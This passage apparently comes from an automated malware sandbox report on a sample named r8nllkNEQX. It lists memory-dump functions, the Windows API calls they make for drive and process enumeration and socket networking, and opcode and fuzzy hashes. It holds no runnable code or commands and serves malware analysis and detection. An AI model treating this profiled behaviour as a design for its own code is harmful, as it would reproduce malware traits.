                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: 0461dee15ac5bf012d1b56bacca72a9f30598deb60c4bc723f5681945045b342
                                    • Instruction ID: 8ba9ddda5e8ea312507946cb0c6a76e20399a2bc7dbbe4ead25c8036e213340c
                                    • Opcode Fuzzy Hash: 0461dee15ac5bf012d1b56bacca72a9f30598deb60c4bc723f5681945045b342
                                    • Instruction Fuzzy Hash: 24317CEB26D228BD7242C2C52B54AFF6B6EE5D7734F30862AF427D1502F6944E4A5031
                                    Function 07100253 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6a29352f8abb66baa4c7b95dacd98c3cc58f3e80db0a8eb7fdba0dc3c8d83117
                                    • Instruction ID: 42b23ffc31267c8d9ee3c359929b482d1be0d1f4186f2e6163676585a31f9e8c
                                    • Opcode Fuzzy Hash: 6a29352f8abb66baa4c7b95dacd98c3cc58f3e80db0a8eb7fdba0dc3c8d83117
                                    • Instruction Fuzzy Hash: 2031C3FB02C120BEA14B51516B19BFA6B1EE6DF730B324566F407D96C1E3D80B8950F6
                                    Function 00384950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • gethostname.WS2_32(00000000,00000040), ref: 00384AA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: gethostname
                                    • String ID:
                                    • API String ID: 144339138-0
                                    • Opcode ID: af1b516954e691c970b3902f4a07d54f49a921594975aa32d26acff4161748af
                                    • Instruction ID: 268683b953aa3a47b779ac1f215209c8f0fd0bdd269d5c9c6a36b51cf772545c
                                    • Opcode Fuzzy Hash: af1b516954e691c970b3902f4a07d54f49a921594975aa32d26acff4161748af
                                    • Instruction Fuzzy Hash: 2251F3706043028BEB33AF65DD4972376D8AF41315F1508BCE98A8BED1E7B8E844C742
                                    Function 070A0C88 Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: dcdb4a8a2b0790418e0850b8826f29825f467319289d54114d0454b0ed7715ab
                                    • Instruction ID: 944f2f0ed60e3d9c0f585b7499308b2b08f303ba51843af22a2ddf1e760eb432
                                    • Opcode Fuzzy Hash: dcdb4a8a2b0790418e0850b8826f29825f467319289d54114d0454b0ed7715ab
                                    • Instruction Fuzzy Hash: 9031B0E722D229BDB242C1D56B549FF2B6EE5D3334F30862BF427C5602F2844E4A5031
                                    Function 070A0CFF Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: cf6885e8d5fc120fbb335265a1a2fa7750059874ffa889097ce0bab36bc8d9b3
                                    • Instruction ID: f1e7af845a0b3d184b40940d0d0e23997a6649562c2efb1fd0f6b99ad3f266bf
                                    • Opcode Fuzzy Hash: cf6885e8d5fc120fbb335265a1a2fa7750059874ffa889097ce0bab36bc8d9b3
                                    • Instruction Fuzzy Hash: 5B219EEB26D229BD7142C1C52B54AFF1B6EE5E7734F30862BF427D5601F2845E4A5032
                                    Function 07100337 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7f8fbc0fd9b0dccf0346ed2d441441137c10ad582bb4476f3dba18a6d5d66e9
                                    • Instruction ID: 11a011fdb7ab145cd9ed9056499609956f18cb2f6599acf13785c58875942e99
                                    • Opcode Fuzzy Hash: e7f8fbc0fd9b0dccf0346ed2d441441137c10ad582bb4476f3dba18a6d5d66e9
                                    • Instruction Fuzzy Hash: CD21D6FB05D1607E611741816F54BF76A1EE5CB330B328566F807DAAC2D3D80B4910F6
                                    Function 07100410 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: c469d5017edf9dcf61e65c54455683cb2070a4639799ca366f945ce38f16ae5d
                                    • Instruction ID: b6de14f989bb9e4189f6cc4069f572077391539f6cd2df2ea1e579cacc1e0749
                                    • Opcode Fuzzy Hash: c469d5017edf9dcf61e65c54455683cb2070a4639799ca366f945ce38f16ae5d
                                    • Instruction Fuzzy Hash: 77016DFB15D060BD705A91812F55FFB666EE1CB730732852BF803D99C2E3C80A4A10BA
                                    Function 0710041D Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 890b8f67fab628b5fa3da1037fac96de04878638abe2fcbf693c9665d51f1937
                                    • Instruction ID: b4aa55584bd4b8f0109c13f3c00d5daa48cd14c5b5f938c9b96d84c98ddc866d
                                    • Opcode Fuzzy Hash: 890b8f67fab628b5fa3da1037fac96de04878638abe2fcbf693c9665d51f1937
                                    • Instruction Fuzzy Hash: 32017CFB11D0607C705281912F54EFBAB6DE5C7630332C86AF802D9986D3C80F8E51BA
                                    Function 0710043B Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: d7268303393ac65b5d47e4b1afabb86c2b710e275b9fa3b2ed35d78fec8843e6
                                    • Instruction ID: b1d768a034f5bcb23a802537bc286e827bb0cd55154fa9c339d6239457250db4
                                    • Opcode Fuzzy Hash: d7268303393ac65b5d47e4b1afabb86c2b710e275b9fa3b2ed35d78fec8843e6
                                    • Instruction Fuzzy Hash: 950146FF14D0607D704291423E19EFBAB6DD4C7730331886BF802D5986E3C80A4A60B6
                                    Function 0039AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 0039AFD1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID:
                                    • API String ID: 3358416759-0
                                    • Opcode ID: 7962cbe1c45b59462820b81a3f2644d6ca7b615c2dc1711c3d469539a7b7021b
                                    • Instruction ID: 213e85466d27a5584cddd8a7022b78286a51db3a8551e37b8d9c9ed6a276b603
                                    • Opcode Fuzzy Hash: 7962cbe1c45b59462820b81a3f2644d6ca7b615c2dc1711c3d469539a7b7021b
                                    • Instruction Fuzzy Hash: C6116670808B8596EB268F1CD8027F6F3F4EFD4329F109619E59942550F7725AD68BC2
                                    Function 0710051C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 8483b4b63edfb1d6cc1525721403be727665c7d7a4bc09b9f4cd86b6fb8e66c0
                                    • Instruction ID: f1b9c8948754809bc3c0f6e7ba13dcf666975b9d0d6b48a3b352c449ce7cb05c
                                    • Opcode Fuzzy Hash: 8483b4b63edfb1d6cc1525721403be727665c7d7a4bc09b9f4cd86b6fb8e66c0
                                    • Instruction Fuzzy Hash: 80F0C0FB005400BF8102556099C8EFA7B6CB9CB6303210184E0058B9C2D3D94246C7F2
                                    Function 0039A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0039A97E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    • Opcode ID: 9c1b74514fef7b778e9b49616e0ea2d78b468c81bb68e1dcfbe18284c65a2439
                                    • Instruction ID: 59a83a28c8bd89d61bb867535502964089262e5ecec6b460a4c6a8f98b5b28cc
                                    • Opcode Fuzzy Hash: 9c1b74514fef7b778e9b49616e0ea2d78b468c81bb68e1dcfbe18284c65a2439
                                    • Instruction Fuzzy Hash: E601A272B01B14AFC7159F28DC45B5AB7A5FF84720F068659FA982B361C331BC118BD1
                                    Function 0039AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(?,0039B280,00000000,-00000001,00000000,0039B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0039AF67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: socket
                                    • String ID:
                                    • API String ID: 98920635-0
                                    • Opcode ID: eb443b55324c456d847cbec07e8aad63b2a44130950df7732ca72e8712b77563
                                    • Instruction ID: a9ccf2eb21d9991be896c7a1dd3dca37762f34a2c04e64d7bc3c23192ec03cf7
                                    • Opcode Fuzzy Hash: eb443b55324c456d847cbec07e8aad63b2a44130950df7732ca72e8712b77563
                                    • Instruction Fuzzy Hash: F1E06DB2A086256BCA10DA08E8409ABF3A9EFC4B20F064A09B85463304C330AC448BE2
                                    Function 0039B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • closesocket.WS2_32(?,00399422,?,?,?,?,?,?,?,?,?,?,?,w38,007AC880,00000000), ref: 0039B04D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID:
                                    • API String ID: 2781271927-0
                                    • Opcode ID: 724333adabb8bc93be2162de41717cccdf0760c47156f135efd23595fdab4940
                                    • Instruction ID: a287c9056ffc05576b0c71b14336dbfa903951a1019ea387a48d9070ac79a0d5
                                    • Opcode Fuzzy Hash: 724333adabb8bc93be2162de41717cccdf0760c47156f135efd23595fdab4940
                                    • Instruction Fuzzy Hash: 8DD0C23430020157CE208A14D984A57B26B7FC0310FA9CB6CE02C4A260D73BCC438601
                                    Function 003367E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    • ioctlsocket.WS2_32(?,8004667E,?,?,0030AF56,?,00000001), ref: 003367FC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: ioctlsocket
                                    • String ID:
                                    • API String ID: 3577187118-0
                                    • Opcode ID: a13e9c9df0d5a849ecd289dec0b8957d2aa855ccff3521f914db4d2f8014e20c
                                    • Instruction ID: cf197a33307673fae5981a8a78e34832f12856552c5e8151f62079c405236f7b
                                    • Opcode Fuzzy Hash: a13e9c9df0d5a849ecd289dec0b8957d2aa855ccff3521f914db4d2f8014e20c
                                    • Instruction Fuzzy Hash: 06C012F1218101AFC6088724D455F2FB6D9DB44365F01581CB046C1190EA305990CA16
                                    Function 07090AD7 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 9e7c76847b58b1117c3d836838308d01f3f45bc5e41ff2e6f9663a2bbe4c5748
                                    • Instruction ID: 217e7321a1301dceea1adfa2188b7b9f045e446ae34e7599790c29cf3f82a3c3
                                    • Opcode Fuzzy Hash: 9e7c76847b58b1117c3d836838308d01f3f45bc5e41ff2e6f9663a2bbe4c5748
                                    • Instruction Fuzzy Hash: 3C3125E706C11AADAB0286459B50BFE77BEEAD7334F30463AF427A6A01D2610F492571
                                    Function 07090B55 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: 87555f835d40bac220efd3c10ab32be2be4d31db55f2d8a5af56b4b0cc437622
                                    • Instruction ID: 3b3d57fea1955cac036ac33fe8429b0d6da6739d77f6cc2a1fb174ba334b1589
                                    • Opcode Fuzzy Hash: 87555f835d40bac220efd3c10ab32be2be4d31db55f2d8a5af56b4b0cc437622
                                    • Instruction Fuzzy Hash: 232122E716C116BDAA0286409B50BFE7B7EE6D7334F304237F477E5A02D3A10A496171
                                    Function 07090AE0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7090000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: O^ZP
                                    • API String ID: 0-2939056359
                                    • Opcode ID: de253d46caedfb9f023dddb84103b17ab0d2acbd508e79f59a7c819338c6f876
                                    • Instruction ID: 4ff4a0d01f6894dc2353b7500a6d8bc24c3f2b9b109cecdebfc8bb1f719eea93
                                    • Opcode Fuzzy Hash: de253d46caedfb9f023dddb84103b17ab0d2acbd508e79f59a7c819338c6f876
                                    • Instruction Fuzzy Hash: 3C2125E716C116BDAA028A459740BFEB7BEEAD7334F304636F467A5602D3610F486570
                                    Function 07090B18 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608174756.0000000007090000.00000040.00001000.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                    Joe Sandbox IDA Plugin
